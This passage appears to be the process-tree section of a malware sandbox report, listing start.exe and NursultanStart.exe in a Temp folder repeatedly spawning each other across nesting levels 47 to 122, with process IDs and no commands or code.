C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"47⤵PID:3036
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"47⤵PID:2620
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"48⤵PID:2636
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"48⤵PID:2460
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"49⤵PID:2444
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"49⤵PID:676
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"50⤵PID:2836
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"50⤵PID:2260
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"51⤵PID:2476
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"51⤵PID:2632
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"52⤵PID:1276
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"52⤵PID:2500
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"53⤵PID:2408
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"53⤵PID:2108
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"54⤵PID:2676
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"54⤵PID:2452
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"55⤵PID:816
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"55⤵PID:2268
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"56⤵PID:972
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"56⤵PID:2104
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"57⤵PID:1840
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"57⤵PID:1100
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"58⤵PID:840
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"58⤵PID:1340
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"59⤵PID:2088
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"59⤵PID:2316
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"60⤵PID:608
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"60⤵PID:852
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"61⤵PID:1736
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"61⤵PID:2792
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"62⤵PID:2280
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"62⤵PID:1928
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"63⤵PID:1084
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"63⤵PID:1792
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"64⤵PID:1320
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"64⤵PID:1948
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"65⤵PID:1036
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"65⤵PID:1608
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"66⤵PID:1236
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"66⤵PID:1776
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"67⤵PID:1976
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"67⤵PID:932
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"68⤵PID:1124
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"68⤵PID:2336
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"69⤵PID:1932
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"69⤵PID:2136
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"70⤵PID:3000
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"70⤵PID:1728
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"71⤵PID:2184
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"71⤵PID:2352
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"72⤵PID:1580
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"72⤵PID:2956
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"73⤵PID:3024
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"73⤵PID:2216
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"74⤵PID:2052
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"74⤵PID:3036
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"75⤵PID:2612
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"75⤵PID:896
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"76⤵PID:2972
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"76⤵PID:2424
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"77⤵PID:1352
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"77⤵PID:1216
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"78⤵PID:1524
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"78⤵PID:2540
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"79⤵PID:2888
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"79⤵PID:2696
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"80⤵PID:2852
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"80⤵PID:2340
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"81⤵PID:1656
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"81⤵PID:2284
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"82⤵PID:2452
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"82⤵PID:2152
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"83⤵PID:816
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"83⤵PID:2268
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"84⤵PID:2568
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"84⤵PID:1748
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"85⤵PID:1096
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"85⤵PID:2784
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"86⤵PID:1744
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"86⤵PID:2088
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"87⤵PID:2220
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"87⤵PID:2272
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"88⤵PID:2736
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"88⤵PID:2084
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"89⤵PID:824
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"89⤵PID:2792
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"90⤵PID:1184
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"90⤵PID:1960
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"91⤵PID:1736
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"91⤵PID:1608
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"92⤵PID:1884
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"92⤵PID:1968
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"93⤵PID:1648
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"93⤵PID:1012
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"94⤵PID:744
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"94⤵PID:2312
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"95⤵PID:2880
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"95⤵PID:2892
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"96⤵PID:552
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"96⤵PID:2008
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"97⤵PID:2064
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"97⤵PID:1728
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"98⤵PID:2432
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"98⤵PID:2964
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"99⤵PID:592
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"99⤵PID:1464
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"100⤵PID:1208
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"100⤵PID:896
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"101⤵PID:2264
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"101⤵PID:3056
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"102⤵PID:2600
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"102⤵PID:2424
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"103⤵PID:2480
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"103⤵PID:2808
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"104⤵PID:240
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"104⤵PID:564
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"105⤵PID:2556
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"105⤵PID:2624
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"106⤵PID:2836
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"106⤵PID:1016
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"107⤵PID:2436
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"107⤵PID:732
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"108⤵PID:1652
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"108⤵PID:2056
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"109⤵PID:948
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"109⤵PID:2692
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"110⤵PID:2428
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"110⤵PID:2676
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"111⤵PID:2328
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"111⤵PID:1560
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"112⤵PID:880
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"112⤵PID:2460
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"113⤵PID:1408
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"113⤵PID:816
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"114⤵PID:2296
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"114⤵PID:2640
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"115⤵PID:2768
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"115⤵PID:1748
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"116⤵PID:2020
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"116⤵PID:2160
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"117⤵PID:852
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"117⤵PID:2764
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"118⤵PID:1344
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"118⤵PID:944
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"119⤵PID:964
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"119⤵PID:1928
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"120⤵PID:1356
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"120⤵PID:1316
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"121⤵PID:788
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"121⤵PID:2792
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"122⤵PID:1948
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-